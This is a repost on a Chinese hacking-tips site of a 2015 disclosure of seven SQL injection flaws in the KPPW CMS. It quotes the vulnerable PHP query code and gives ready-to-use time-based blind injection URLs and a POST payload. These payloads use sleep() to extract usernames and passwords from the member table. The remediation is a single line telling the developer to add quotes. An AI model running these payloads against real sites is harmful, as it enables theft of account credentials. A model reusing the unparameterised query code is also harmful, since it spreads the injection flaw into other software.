记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

KPPW最新版SQL注入漏洞七(多处不同注入点)

2015-01-20 23:47

KPPW最新版SQL注入漏洞七,多处不同注入点




第一处sql注入:

文件/control/user/transaction_works.php:


if($action == 'delete_image'){
$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
$arrFileInfo = db_factory::get_one($strSql);
$resText = CommonClass::delFileByFileId($fileid);
if($resText){
$array = explode(',', $arrServiceInfo['pic']);
$newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
$_POST['file_ids'] = implode(",", $newArr);
updateFilepath($arrServiceInfo['service_id'], $_POST['file_ids'], 'pic');
kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die;
}
}



注意这里:


$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);



$fileid没有引号保护进入sql语句,导致存在注入



第二,三处sql注入:

继续看下面的:


$resText = CommonClass::delFileByFileId($fileid);



$fileid继续进入了函数delFileByFileId,跟进函数delFileByFileId:

文件:/lib/inc/CommonClass.php


public static function delFileByFileId($fileId){
$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileId);
$arrFileInfo = db_factory::get_one($strSql);
$filename = S_ROOT.$arrFileInfo['save_name'];
if(file_exists($filename)){
unlink($filename);
}
return db_factory::execute("delete from ".TABLEPRE."witkey_file where file_id = ".$fileId);
}



这里存在两处注入,$fileid变量进入select和delete语句都没有处理,导致sql注入



第四,五,六处sql注入:

同意的问题出现在文件/control/user/transaction_works.php:


if($action == 'delete_goodsfile'){
$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
$arrFileInfo = db_factory::get_one($strSql);
$resText = CommonClass::delFileByFileId($fileid);
if($resText){
$array = explode(',', $arrServiceInfo['file_path']);
$newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
$_POST['file_path_2'] = implode(",", $newArr);
updateFilepath($arrServiceInfo['service_id'], $_POST['file_path_2'], 'file');
kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die;
}
}



这里的问题跟上面分析的问题一样,存在注入。



第七处sql注入:

文件/control/user/transaction_works.php:


if (isset($formhash)&&kekezu::submitcheck($formhash)) {
$arrGoodsConfig = unserialize($kekezu->_model_list[6]['config']);
$goodsprice = floatval($goodsprice);
$floatMinCash = floatval($arrGoodsConfig['min_cash']);
if($floatMinCash&&($goodsprice < $floatMinCash)){
$tips['errors']['goodsprice'] = '最小金额不能少于'.$floatMinCash.'元';
kekezu::show_msg($tips,null,NULL,NULL,'error');
}
if (strtoupper ( CHARSET ) == 'GBK') {
$goodsname = kekezu::utftogbk($goodsname );
$goodsdesc = kekezu::utftogbk($goodsdesc );
$unite_price = kekezu::utftogbk($unite_price );
}
$arrData = array(
'model_id'=> $arrServiceInfo['model_id']?$arrServiceInfo['model_id']:6,
'uid'=> $gUid,
'username'=> $gUserInfo['username'],
'indus_id'=> $indus_id,
'indus_pid'=> $indus_pid,
'title'=> $goodsname,
'price' => $goodsprice,
'pic'=> $file_ids,
'content'=> $goodsdesc,
'unite_price'=> $unite_price,
'submit_method'=> $submit_method,
'file_path'=> $file_path_2,
'confirm_max' => intval($arrGoodsConfig['confirm_max_day'])
);
if(!$pk['service_id']){
$arrData['profit_rate'] = $arrGoodsConfig['service_profit'];
$arrData['on_time'] = time();
$arrData['service_status'] = 2;
}
$objServiceT = new keke_table_class ( 'witkey_service' );
$objServiceT->save ( $arrData,$pk);
unset($objServiceT);
if ($objId&&$intTaskId) {
$strBidSql = ' UPDATE `'.TABLEPRE.'witkey_task_bid` SET `hasdel`=1 WHERE (`bid_id` ='.$objId.') and task_id = '.$intTaskId;
$strWorkSql = ' UPDATE `'.TABLEPRE.'witkey_task_work` SET `hasdel`=1 WHERE (`work_id`='.$objId.') and task_id = '.$intTaskId;
db_factory::execute($strBidSql);
db_factory::execute($strWorkSql);
}
kekezu::show_msg('操作成功',$strJumpUrl,NULL,NULL,'ok');
}



注意这里的:


$objServiceT->save ( $arrData,$pk);



这里的变量$pk进入了save函数,跟进save函数

文件/lib/inc/keke_table_class.php:


function save($fields, $pk = array()) {
foreach ( $fields as $k => $v ) {
$kk = ucfirst ( $k );
$set_query = "set" . $kk;
$this->_table_obj->$set_query ( $v );
}
$keys = array_keys ( $pk );
$key = $keys [0];
//echo $key."\n";
//print_r($pk);
//echo $pk[$key];
if (! empty ( $pk [$key] )) {
$this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" );
$edit_query = "edit_" . $this->_pre . $this->_table_name;
$res = $this->_table_obj->$edit_query ();
} else {
$create_query = "create_" . $this->_pre . $this->_table_name;
$res = $this->_table_obj->$create_query ();
}
if ($res) {
return $res;
} else {
return false;
}
}



最后$pk的key进入了setWhere条件语句中,导致sql注入

第一处SQL注入:


http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566) and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23



这里会延迟5秒返回,说明UserName第一个字符为a,继续即可注入出用户信息



第二,三处SQL注入:


http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)



这里会延迟5秒返回,说明UserName第一个字符为a,继续即可注入出用户信息
 

1.png





第七处SQL注入:


http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork

formhash=6cb7d4&objId=0&pk%5Bservice_id=1+and+1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23%5D=222222&goodsname=111&goodsdesc=111&indus_pid=249&indus_id=-1&upload=&file_ids=&goodsprice=111&unite_price=%E4%B8%AA&submit_method=outside&file_upload_i=&file_path_2=



这里会延迟5秒返回,说明UserName第一个字符为a,继续即可注入出用户信息

解决方案:

加单引号保护即可

知识来源: www.2cto.com/Article/201501/371780.html

阅读:98010 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“KPPW最新版SQL注入漏洞七(多处不同注入点)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词